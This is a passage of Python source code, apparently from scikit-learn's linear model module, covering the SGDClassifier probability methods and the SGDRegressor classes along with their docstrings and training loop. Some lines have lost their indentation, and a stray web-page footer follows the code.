"""Linear classifiers (SVM, logistic regression, etc.) with SGD training.
This estimator implements regularized linear models with stochastic
gradient descent (SGD) learning: the gradient of the loss is estimated
each sample at a time and the model is updated along the way with a
decreasing strength schedule (aka learning rate). SGD allows minibatch
(online/out-of-core) learning via the `partial_fit` method.
For best results using the default learning rate schedule, the data should
have zero mean and unit variance.
This implementation works with data represented as dense or sparse arrays
of floating point values for the features. The model it fits can be
controlled with the loss parameter; by default, it fits a linear support
vector machine (SVM).
The regularizer is a penalty added to the loss function that shrinks model
parameters towards the zero vector using either the squared euclidean norm
L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
parameter update crosses the 0.0 value because of the regularizer, the
update is truncated to 0.0 to allow for learning sparse models and achieve
online feature selection.
Read more in the :ref:`User Guide <sgd>`.
Parameters
----------
loss : str, default='hinge'
The loss function to be used. Defaults to 'hinge', which gives a
linear SVM.
The possible options are 'hinge', 'log', 'modified_huber',
'squared_hinge', 'perceptron', or a regression loss: 'squared_loss',
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
The 'log' loss gives logistic regression, a probabilistic classifier.
'modified_huber' is another smooth loss that brings tolerance to
outliers as well as probability estimates.
'squared_hinge' is like hinge but is quadratically penalized.
'perceptron' is the linear loss used by the perceptron algorithm.
The other losses are designed for regression but can be useful in
classification as well; see
:class:`~sklearn.linear_model.SGDRegressor` for a description.
More details about the losses formulas can be found in the
:ref:`User Guide <sgd_mathematical_formulation>`.
penalty : {'l2', 'l1', 'elasticnet'}, default='l2'
The penalty (aka regularization term) to be used. Defaults to 'l2'
which is the standard regularizer for linear SVM models. 'l1' and
'elasticnet' might bring sparsity to the model (feature selection)
not achievable with 'l2'.
alpha : float, default=0.0001
Constant that multiplies the regularization term. The higher the
value, the stronger the regularization.
Also used to compute the learning rate when `learning_rate` is
set to 'optimal'.
l1_ratio : float, default=0.15
The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
Only used if `penalty` is 'elasticnet'.
fit_intercept : bool, default=True
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered.
max_iter : int, default=1000
The maximum number of passes over the training data (aka epochs).
It only impacts the behavior in the ``fit`` method, and not the
:meth:`partial_fit` method.
.. versionadded:: 0.19
tol : float, default=1e-3
The stopping criterion. If it is not None, training will stop
when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive
epochs.
.. versionadded:: 0.19
shuffle : bool, default=True
Whether or not the training data should be shuffled after each epoch.
verbose : int, default=0
The verbosity level.
epsilon : float, default=0.1
Epsilon in the epsilon-insensitive loss functions; only if `loss` is
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
For 'huber', determines the threshold at which it becomes less
important to get the prediction exactly right.
For epsilon-insensitive, any differences between the current prediction
and the correct label are ignored if they are less than this threshold.
n_jobs : int, default=None
The number of CPUs to use to do the OVA (One Versus All, for
multi-class problems) computation.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
random_state : int, RandomState instance, default=None
Used for shuffling the data, when ``shuffle`` is set to ``True``.
Pass an int for reproducible output across multiple function calls.
See :term:`Glossary <random_state>`.
learning_rate : str, default='optimal'
The learning rate schedule:
- 'constant': `eta = eta0`
- 'optimal': `eta = 1.0 / (alpha * (t + t0))`
where t0 is chosen by a heuristic proposed by Leon Bottou.
- 'invscaling': `eta = eta0 / pow(t, power_t)`
- 'adaptive': eta = eta0, as long as the training keeps decreasing.
Each time n_iter_no_change consecutive epochs fail to decrease the
training loss by tol or fail to increase validation score by tol if
early_stopping is True, the current learning rate is divided by 5.
.. versionadded:: 0.20
Added 'adaptive' option
eta0 : double, default=0.0
The initial learning rate for the 'constant', 'invscaling' or
'adaptive' schedules. The default value is 0.0 as eta0 is not used by
the default schedule 'optimal'.
power_t : double, default=0.5
The exponent for inverse scaling learning rate [default 0.5].
early_stopping : bool, default=False
Whether to use early stopping to terminate training when validation
score is not improving. If set to True, it will automatically set aside
a stratified fraction of training data as validation and terminate
training when validation score returned by the `score` method is not
improving by at least tol for n_iter_no_change consecutive epochs.
.. versionadded:: 0.20
Added 'early_stopping' option
validation_fraction : float, default=0.1
The proportion of training data to set aside as validation set for
early stopping. Must be between 0 and 1.
Only used if `early_stopping` is True.
.. versionadded:: 0.20
Added 'validation_fraction' option
n_iter_no_change : int, default=5
Number of iterations with no improvement to wait before early stopping.
.. versionadded:: 0.20
Added 'n_iter_no_change' option
class_weight : dict, {class_label: weight} or "balanced", default=None
Preset for the class_weight fit parameter.
Weights associated with classes. If not given, all classes
are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``.
warm_start : bool, default=False
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
See :term:`the Glossary <warm_start>`.
Repeatedly calling fit or partial_fit when warm_start is True can
result in a different solution than when calling fit a single time
because of the way the data is shuffled.
If a dynamic learning rate is used, the learning rate is adapted
depending on the number of samples already seen. Calling ``fit`` resets
this counter, while ``partial_fit`` will result in increasing the
existing counter.
average : bool or int, default=False
When set to True, computes the averaged SGD weights across all
updates and stores the result in the ``coef_`` attribute. If set to
an int greater than 1, averaging will begin once the total number of
samples seen reaches `average`. So ``average=10`` will begin
averaging after seeing 10 samples.
Attributes
----------
coef_ : ndarray of shape (1, n_features) if n_classes == 2 else \
(n_classes, n_features)
Weights assigned to the features.
intercept_ : ndarray of shape (1,) if n_classes == 2 else (n_classes,)
Constants in decision function.
n_iter_ : int
The actual number of iterations before reaching the stopping criterion.
For multiclass fits, it is the maximum over every binary fit.
loss_function_ : concrete ``LossFunction``
classes_ : array of shape (n_classes,)
t_ : int
Number of weight updates performed during training.
Same as ``(n_iter_ * n_samples)``.
See Also
--------
sklearn.svm.LinearSVC : Linear support vector classification.
LogisticRegression : Logistic regression.
Perceptron : Inherits from SGDClassifier. ``Perceptron()`` is equivalent to
``SGDClassifier(loss="perceptron", eta0=1, learning_rate="constant",
penalty=None)``.
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import SGDClassifier
>>> from sklearn.preprocessing import StandardScaler
>>> from sklearn.pipeline import make_pipeline
>>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
>>> Y = np.array([1, 1, 2, 2])
>>> # Always scale the input. The most convenient way is to use a pipeline.
>>> clf = make_pipeline(StandardScaler(),
... SGDClassifier(max_iter=1000, tol=1e-3))
>>> clf.fit(X, Y)
Pipeline(steps=[('standardscaler', StandardScaler()),
('sgdclassifier', SGDClassifier())])
>>> print(clf.predict([[-0.8, -1]]))
[1]
"""
    @_deprecate_positional_args
    def __init__(self, loss="hinge", *, penalty='l2', alpha=0.0001,
                 l1_ratio=0.15,
                 fit_intercept=True, max_iter=1000, tol=1e-3, shuffle=True,
                 verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,
                 random_state=None, learning_rate="optimal", eta0=0.0,
                 power_t=0.5, early_stopping=False, validation_fraction=0.1,
                 n_iter_no_change=5, class_weight=None, warm_start=False,
                 average=False):
        # Thin constructor: every hyper-parameter is forwarded unchanged to
        # the base class, which stores and later validates them.  All
        # arguments after ``loss`` are keyword-only (the bare ``*``); the
        # decorator additionally warns on positional use during the
        # deprecation period.
        super().__init__(
            loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
            fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
            shuffle=shuffle, verbose=verbose, epsilon=epsilon, n_jobs=n_jobs,
            random_state=random_state, learning_rate=learning_rate, eta0=eta0,
            power_t=power_t, early_stopping=early_stopping,
            validation_fraction=validation_fraction,
            n_iter_no_change=n_iter_no_change, class_weight=class_weight,
            warm_start=warm_start, average=average)
def _check_proba(self):
if self.loss not in ("log", "modified_huber"):
raise AttributeError("probability estimates are not available for"
" loss=%r" % self.loss)
    @property
    def predict_proba(self):
        """Probability estimates.
        This method is only available for log loss and modified Huber loss.
        Multiclass probability estimates are derived from binary (one-vs.-rest)
        estimates by simple normalization, as recommended by Zadrozny and
        Elkan.
        Binary probability estimates for loss="modified_huber" are given by
        (clip(decision_function(X), -1, 1) + 1) / 2. For other loss functions
        it is necessary to perform proper probability calibration by wrapping
        the classifier with
        :class:`~sklearn.calibration.CalibratedClassifierCV` instead.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Input data for prediction.
        Returns
        -------
        ndarray of shape (n_samples, n_classes)
            Returns the probability of the sample for each class in the model,
            where classes are ordered as they are in `self.classes_`.
        References
        ----------
        Zadrozny and Elkan, "Transforming classifier scores into multiclass
        probability estimates", SIGKDD'02,
        http://www.research.ibm.com/people/z/zadrozny/kdd2002-Transf.pdf
        The justification for the formula in the loss="modified_huber"
        case is in the appendix B in:
        http://jmlr.csail.mit.edu/papers/volume2/zhang02c/zhang02c.pdf
        """
        # Property trick: accessing ``clf.predict_proba`` first validates the
        # loss (raising AttributeError for unsupported losses, so hasattr()
        # reports False), then returns the bound implementation so callers
        # can still invoke it as ``clf.predict_proba(X)``.
        self._check_proba()
        return self._predict_proba
    def _predict_proba(self, X):
        # Implementation behind the ``predict_proba`` property.
        check_is_fitted(self)
        if self.loss == "log":
            # Logistic loss: delegate to the shared logistic-regression
            # probability helper.
            return self._predict_proba_lr(X)
        elif self.loss == "modified_huber":
            binary = (len(self.classes_) == 2)
            scores = self.decision_function(X)
            if binary:
                prob2 = np.ones((scores.shape[0], 2))
                # NOTE: ``prob`` is a *view* into prob2[:, 1]; the in-place
                # operations below therefore update prob2 as well.
                prob = prob2[:, 1]
            else:
                # Multiclass: operate directly on the OvR scores, in place.
                prob = scores
            # Zhang's formula: (clip(f(x), -1, 1) + 1) / 2, written into
            # ``prob`` via np.clip's ``out`` argument.
            np.clip(scores, -1, 1, prob)
            prob += 1.
            prob /= 2.
            if binary:
                # Negative-class column is the complement; since ``prob``
                # aliases prob2[:, 1], prob2 now holds [1 - p, p].
                prob2[:, 0] -= prob
                prob = prob2
            else:
                # the above might assign zero to all classes, which doesn't
                # normalize neatly; work around this to produce uniform
                # probabilities
                prob_sum = prob.sum(axis=1)
                all_zero = (prob_sum == 0)
                if np.any(all_zero):
                    prob[all_zero, :] = 1
                    prob_sum[all_zero] = len(self.classes_)
                # normalize
                prob /= prob_sum.reshape((prob.shape[0], -1))
            return prob
        else:
            # _check_proba should prevent reaching here via the public
            # property; kept as a defensive error for direct calls.
            raise NotImplementedError("predict_(log_)proba only supported when"
                                      " loss='log' or loss='modified_huber' "
                                      "(%r given)" % self.loss)
    @property
    def predict_log_proba(self):
        """Log of probability estimates.
        This method is only available for log loss and modified Huber loss.
        When loss="modified_huber", probability estimates may be hard zeros
        and ones, so taking the logarithm is not possible.
        See ``predict_proba`` for details.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            Input data for prediction.
        Returns
        -------
        T : array-like, shape (n_samples, n_classes)
            Returns the log-probability of the sample for each class in the
            model, where classes are ordered as they are in
            `self.classes_`.
        """
        # Same property trick as ``predict_proba``: validate the loss on
        # attribute access, then hand back the bound implementation.
        self._check_proba()
        return self._predict_log_proba
def _predict_log_proba(self, X):
return np.log(self.predict_proba(X))
def _more_tags(self):
return {
'_xfail_checks': {
'check_sample_weights_invariance':
'zero sample_weight is not equivalent to removing samples',
}
}
class BaseSGDRegressor(RegressorMixin, BaseSGD):
    # Base class for SGD regressors; abstract (see __init__) and not part of
    # the public API.
    # Maps each public ``loss`` string to a tuple of (loss-function class,
    # extra constructor arguments for that class — an epsilon where needed).
    loss_functions = {
        "squared_loss": (SquaredLoss, ),
        "huber": (Huber, DEFAULT_EPSILON),
        "epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
        "squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
                                        DEFAULT_EPSILON),
    }
    @abstractmethod
    @_deprecate_positional_args
    def __init__(self, loss="squared_loss", *, penalty="l2", alpha=0.0001,
                 l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
                 shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
                 random_state=None, learning_rate="invscaling", eta0=0.01,
                 power_t=0.25, early_stopping=False, validation_fraction=0.1,
                 n_iter_no_change=5, warm_start=False, average=False):
        # Abstract pass-through constructor: forwards every hyper-parameter
        # to BaseSGD unchanged.  @abstractmethod keeps this base class from
        # being instantiated directly.
        super().__init__(
            loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
            fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
            shuffle=shuffle, verbose=verbose, epsilon=epsilon,
            random_state=random_state, learning_rate=learning_rate, eta0=eta0,
            power_t=power_t, early_stopping=early_stopping,
            validation_fraction=validation_fraction,
            n_iter_no_change=n_iter_no_change, warm_start=warm_start,
            average=average)
    def _partial_fit(self, X, y, alpha, C, loss, learning_rate,
                     max_iter, sample_weight, coef_init, intercept_init):
        # Shared core of fit() and partial_fit(): validate inputs,
        # (re)allocate parameter buffers if needed, then run the SGD loop.
        X, y = self._validate_data(X, y, accept_sparse="csr", copy=False,
                                   order='C', dtype=np.float64,
                                   accept_large_sparse=False)
        y = y.astype(np.float64, copy=False)
        n_samples, n_features = X.shape
        sample_weight = _check_sample_weight(sample_weight, X)
        # Allocate datastructures from input arguments
        if getattr(self, "coef_", None) is None:
            # First call: a single weight row (single-output regression).
            self._allocate_parameter_mem(1, n_features, coef_init,
                                         intercept_init)
        elif n_features != self.coef_.shape[-1]:
            # Subsequent partial_fit calls must keep the feature count.
            raise ValueError("Number of features %d does not match previous "
                             "data %d." % (n_features, self.coef_.shape[-1]))
        if self.average > 0 and getattr(self, "_average_coef", None) is None:
            # Lazily allocate the running-average buffers used when
            # ``average`` is enabled.
            self._average_coef = np.zeros(n_features,
                                          dtype=np.float64,
                                          order="C")
            self._average_intercept = np.zeros(1, dtype=np.float64, order="C")
        self._fit_regressor(X, y, alpha, C, loss, learning_rate,
                            sample_weight, max_iter)
        return self
    def partial_fit(self, X, y, sample_weight=None):
        """Perform one epoch of stochastic gradient descent on given samples.
        Internally, this method uses ``max_iter = 1``. Therefore, it is not
        guaranteed that a minimum of the cost function is reached after calling
        it once. Matters such as objective convergence and early stopping
        should be handled by the user.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Subset of training data.
        y : numpy array of shape (n_samples,)
            Subset of target values.
        sample_weight : array-like, shape (n_samples,), default=None
            Weights applied to individual samples.
            If not provided, uniform weights are assumed.
        Returns
        -------
        self : returns an instance of self.
        """
        self._validate_params(for_partial_fit=True)
        # One epoch only (max_iter=1); C is fixed to 1.0 for regressors.
        return self._partial_fit(X, y, self.alpha, C=1.0,
                                 loss=self.loss,
                                 learning_rate=self.learning_rate, max_iter=1,
                                 sample_weight=sample_weight, coef_init=None,
                                 intercept_init=None)
    def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
             intercept_init=None, sample_weight=None):
        # Full fit: optionally warm-start from the previous solution, reset
        # the update counter, run the SGD loop, and warn if the stopping
        # criterion was never met within max_iter epochs.
        self._validate_params()
        if self.warm_start and getattr(self, "coef_", None) is not None:
            # Reuse previous coefficients unless explicit inits were given.
            if coef_init is None:
                coef_init = self.coef_
            if intercept_init is None:
                intercept_init = self.intercept_
        else:
            self.coef_ = None
            self.intercept_ = None
        # Clear iteration count for multiple call to fit.
        self.t_ = 1.0
        self._partial_fit(X, y, alpha, C, loss, learning_rate,
                          self.max_iter, sample_weight, coef_init,
                          intercept_init)
        if (self.tol is not None and self.tol > -np.inf
                and self.n_iter_ == self.max_iter):
            # Ran the full epoch budget without hitting the tolerance.
            warnings.warn("Maximum number of iteration reached before "
                          "convergence. Consider increasing max_iter to "
                          "improve the fit.",
                          ConvergenceWarning)
        return self
    def fit(self, X, y, coef_init=None, intercept_init=None,
            sample_weight=None):
        """Fit linear model with Stochastic Gradient Descent.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Training data.
        y : ndarray of shape (n_samples,)
            Target values.
        coef_init : ndarray of shape (n_features,), default=None
            The initial coefficients to warm-start the optimization.
        intercept_init : ndarray of shape (1,), default=None
            The initial intercept to warm-start the optimization.
        sample_weight : array-like, shape (n_samples,), default=None
            Weights applied to individual samples (1. for unweighted).
        Returns
        -------
        self : returns an instance of self.
        """
        # Public entry point; all heavy lifting happens in _fit.
        return self._fit(X, y, alpha=self.alpha, C=1.0,
                         loss=self.loss, learning_rate=self.learning_rate,
                         coef_init=coef_init,
                         intercept_init=intercept_init,
                         sample_weight=sample_weight)
    def _decision_function(self, X):
        """Predict using the linear model.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Input data.
        Returns
        -------
        ndarray of shape (n_samples,)
            Predicted target values per element in X.
        """
        check_is_fitted(self)
        X = check_array(X, accept_sparse='csr')
        # Linear prediction X @ coef.T + intercept; safe_sparse_dot handles
        # both dense and CSR inputs.
        scores = safe_sparse_dot(X, self.coef_.T,
                                 dense_output=True) + self.intercept_
        return scores.ravel()
    def predict(self, X):
        """Predict using the linear model.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features)
            Input data.
        Returns
        -------
        ndarray of shape (n_samples,)
            Predicted target values per element in X.
        """
        # For a regressor the prediction *is* the decision function.
        return self._decision_function(X)
    def _fit_regressor(self, X, y, alpha, C, loss, learning_rate,
                       sample_weight, max_iter):
        # Run the low-level SGD loop (_plain_sgd) and write the resulting
        # coefficients/intercept (plus averaged variants) back onto self.
        dataset, intercept_decay = make_dataset(X, y, sample_weight)
        loss_function = self._get_loss_function(loss)
        penalty_type = self._get_penalty_type(self.penalty)
        learning_rate_type = self._get_learning_rate_type(learning_rate)
        if not hasattr(self, "t_"):
            # First fit ever: start the weight-update counter at 1.
            self.t_ = 1.0
        validation_mask = self._make_validation_split(y)
        validation_score_cb = self._make_validation_score_cb(
            validation_mask, X, y, sample_weight)
        random_state = check_random_state(self.random_state)
        # numpy mtrand expects a C long which is a signed 32 bit integer under
        # Windows
        seed = random_state.randint(0, np.iinfo(np.int32).max)
        # tol=None means "never stop on tolerance"; encode as -inf.
        tol = self.tol if self.tol is not None else -np.inf
        if self.average:
            # Train on the "standard" buffers; the averaged buffers are
            # filled in by the SGD loop.
            coef = self._standard_coef
            intercept = self._standard_intercept
            average_coef = self._average_coef
            average_intercept = self._average_intercept
        else:
            coef = self.coef_
            intercept = self.intercept_
            average_coef = None  # Not used
            average_intercept = [0]  # Not used
        # Intercepts are passed as scalars (``[0]`` indexing); _plain_sgd
        # returns the updated values together with the epoch count.
        coef, intercept, average_coef, average_intercept, self.n_iter_ = \
            _plain_sgd(coef,
                       intercept[0],
                       average_coef,
                       average_intercept[0],
                       loss_function,
                       penalty_type,
                       alpha, C,
                       self.l1_ratio,
                       dataset,
                       validation_mask, self.early_stopping,
                       validation_score_cb,
                       int(self.n_iter_no_change),
                       max_iter, tol,
                       int(self.fit_intercept),
                       int(self.verbose),
                       int(self.shuffle),
                       seed,
                       1.0, 1.0,
                       learning_rate_type,
                       self.eta0, self.power_t, self.t_,
                       intercept_decay, self.average)
        # t_ counts total weight updates: one per sample per epoch.
        self.t_ += self.n_iter_ * X.shape[0]
        if self.average > 0:
            self._average_intercept = np.atleast_1d(average_intercept)
            self._standard_intercept = np.atleast_1d(intercept)
            if self.average <= self.t_ - 1.0:
                # made enough updates for averaging to be taken into account
                self.coef_ = average_coef
                self.intercept_ = np.atleast_1d(average_intercept)
            else:
                self.coef_ = coef
                self.intercept_ = np.atleast_1d(intercept)
        else:
            self.intercept_ = np.atleast_1d(intercept)
class SGDRegressor(BaseSGDRegressor):
    """Linear model fitted by minimizing a regularized empirical loss with SGD
    SGD stands for Stochastic Gradient Descent: the gradient of the loss is
    estimated each sample at a time and the model is updated along the way with
    a decreasing strength schedule (aka learning rate).
    The regularizer is a penalty added to the loss function that shrinks model
    parameters towards the zero vector using either the squared euclidean norm
    L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
    parameter update crosses the 0.0 value because of the regularizer, the
    update is truncated to 0.0 to allow for learning sparse models and achieve
    online feature selection.
    This implementation works with data represented as dense numpy arrays of
    floating point values for the features.
    Read more in the :ref:`User Guide <sgd>`.
    Parameters
    ----------
    loss : str, default='squared_loss'
        The loss function to be used. The possible values are 'squared_loss',
        'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'
        The 'squared_loss' refers to the ordinary least squares fit.
        'huber' modifies 'squared_loss' to focus less on getting outliers
        correct by switching from squared to linear loss past a distance of
        epsilon. 'epsilon_insensitive' ignores errors less than epsilon and is
        linear past that; this is the loss function used in SVR.
        'squared_epsilon_insensitive' is the same but becomes squared loss past
        a tolerance of epsilon.
        More details about the losses formulas can be found in the
        :ref:`User Guide <sgd_mathematical_formulation>`.
    penalty : {'l2', 'l1', 'elasticnet'}, default='l2'
        The penalty (aka regularization term) to be used. Defaults to 'l2'
        which is the standard regularizer for linear SVM models. 'l1' and
        'elasticnet' might bring sparsity to the model (feature selection)
        not achievable with 'l2'.
    alpha : float, default=0.0001
        Constant that multiplies the regularization term. The higher the
        value, the stronger the regularization.
        Also used to compute the learning rate when `learning_rate` is
        set to 'optimal'.
    l1_ratio : float, default=0.15
        The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
        l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
        Only used if `penalty` is 'elasticnet'.
    fit_intercept : bool, default=True
        Whether the intercept should be estimated or not. If False, the
        data is assumed to be already centered.
    max_iter : int, default=1000
        The maximum number of passes over the training data (aka epochs).
        It only impacts the behavior in the ``fit`` method, and not the
        :meth:`partial_fit` method.
        .. versionadded:: 0.19
    tol : float, default=1e-3
        The stopping criterion. If it is not None, training will stop
        when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive
        epochs.
        .. versionadded:: 0.19
    shuffle : bool, default=True
        Whether or not the training data should be shuffled after each epoch.
    verbose : int, default=0
        The verbosity level.
    epsilon : float, default=0.1
        Epsilon in the epsilon-insensitive loss functions; only if `loss` is
        'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
        For 'huber', determines the threshold at which it becomes less
        important to get the prediction exactly right.
        For epsilon-insensitive, any differences between the current prediction
        and the correct label are ignored if they are less than this threshold.
    random_state : int, RandomState instance, default=None
        Used for shuffling the data, when ``shuffle`` is set to ``True``.
        Pass an int for reproducible output across multiple function calls.
        See :term:`Glossary <random_state>`.
    learning_rate : string, default='invscaling'
        The learning rate schedule:
        - 'constant': `eta = eta0`
        - 'optimal': `eta = 1.0 / (alpha * (t + t0))`
          where t0 is chosen by a heuristic proposed by Leon Bottou.
        - 'invscaling': `eta = eta0 / pow(t, power_t)`
        - 'adaptive': eta = eta0, as long as the training keeps decreasing.
          Each time n_iter_no_change consecutive epochs fail to decrease the
          training loss by tol or fail to increase validation score by tol if
          early_stopping is True, the current learning rate is divided by 5.
        .. versionadded:: 0.20
            Added 'adaptive' option
    eta0 : double, default=0.01
        The initial learning rate for the 'constant', 'invscaling' or
        'adaptive' schedules. The default value is 0.01.
    power_t : double, default=0.25
        The exponent for inverse scaling learning rate.
    early_stopping : bool, default=False
        Whether to use early stopping to terminate training when validation
        score is not improving. If set to True, it will automatically set aside
        a fraction of training data as validation and terminate
        training when validation score returned by the `score` method is not
        improving by at least `tol` for `n_iter_no_change` consecutive
        epochs.
        .. versionadded:: 0.20
            Added 'early_stopping' option
    validation_fraction : float, default=0.1
        The proportion of training data to set aside as validation set for
        early stopping. Must be between 0 and 1.
        Only used if `early_stopping` is True.
        .. versionadded:: 0.20
            Added 'validation_fraction' option
    n_iter_no_change : int, default=5
        Number of iterations with no improvement to wait before early stopping.
        .. versionadded:: 0.20
            Added 'n_iter_no_change' option
    warm_start : bool, default=False
        When set to True, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.
        See :term:`the Glossary <warm_start>`.
        Repeatedly calling fit or partial_fit when warm_start is True can
        result in a different solution than when calling fit a single time
        because of the way the data is shuffled.
        If a dynamic learning rate is used, the learning rate is adapted
        depending on the number of samples already seen. Calling ``fit`` resets
        this counter, while ``partial_fit`` will result in increasing the
        existing counter.
    average : bool or int, default=False
        When set to True, computes the averaged SGD weights across all
        updates and stores the result in the ``coef_`` attribute. If set to
        an int greater than 1, averaging will begin once the total number of
        samples seen reaches `average`. So ``average=10`` will begin
        averaging after seeing 10 samples.
    Attributes
    ----------
    coef_ : ndarray of shape (n_features,)
        Weights assigned to the features.
    intercept_ : ndarray of shape (1,)
        The intercept term.
    average_coef_ : ndarray of shape (n_features,)
        Averaged weights assigned to the features. Only available
        if ``average=True``.
        .. deprecated:: 0.23
            Attribute ``average_coef_`` was deprecated
            in version 0.23 and will be removed in 0.25.
    average_intercept_ : ndarray of shape (1,)
        The averaged intercept term. Only available if ``average=True``.
        .. deprecated:: 0.23
            Attribute ``average_intercept_`` was deprecated
            in version 0.23 and will be removed in 0.25.
    n_iter_ : int
        The actual number of iterations before reaching the stopping criterion.
    t_ : int
        Number of weight updates performed during training.
        Same as ``(n_iter_ * n_samples)``.
    Examples
    --------
    >>> import numpy as np
    >>> from sklearn.linear_model import SGDRegressor
    >>> from sklearn.pipeline import make_pipeline
    >>> from sklearn.preprocessing import StandardScaler
    >>> n_samples, n_features = 10, 5
    >>> rng = np.random.RandomState(0)
    >>> y = rng.randn(n_samples)
    >>> X = rng.randn(n_samples, n_features)
    >>> # Always scale the input. The most convenient way is to use a pipeline.
    >>> reg = make_pipeline(StandardScaler(),
    ...                     SGDRegressor(max_iter=1000, tol=1e-3))
    >>> reg.fit(X, y)
    Pipeline(steps=[('standardscaler', StandardScaler()),
                    ('sgdregressor', SGDRegressor())])
    See Also
    --------
    Ridge, ElasticNet, Lasso, sklearn.svm.SVR
    """
    @_deprecate_positional_args
    def __init__(self, loss="squared_loss", *, penalty="l2", alpha=0.0001,
                 l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
                 shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
                 random_state=None, learning_rate="invscaling", eta0=0.01,
                 power_t=0.25, early_stopping=False, validation_fraction=0.1,
                 n_iter_no_change=5, warm_start=False, average=False):
        # Pass-through constructor: forwards every hyper-parameter unchanged
        # to BaseSGDRegressor; all arguments after ``loss`` are keyword-only.
        super().__init__(
            loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
            fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
            shuffle=shuffle, verbose=verbose, epsilon=epsilon,
            random_state=random_state, learning_rate=learning_rate, eta0=eta0,
            power_t=power_t, early_stopping=early_stopping,
            validation_fraction=validation_fraction,
            n_iter_no_change=n_iter_no_change, warm_start=warm_start,
            average=average)
    def _more_tags(self):
        # Estimator-tag overrides for sklearn's common checks: this check is
        # expected to fail, for the stated reason.
        return {
            '_xfail_checks': {
                'check_sample_weights_invariance':
                'zero sample_weight is not equivalent to removing samples',
            }
        }
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.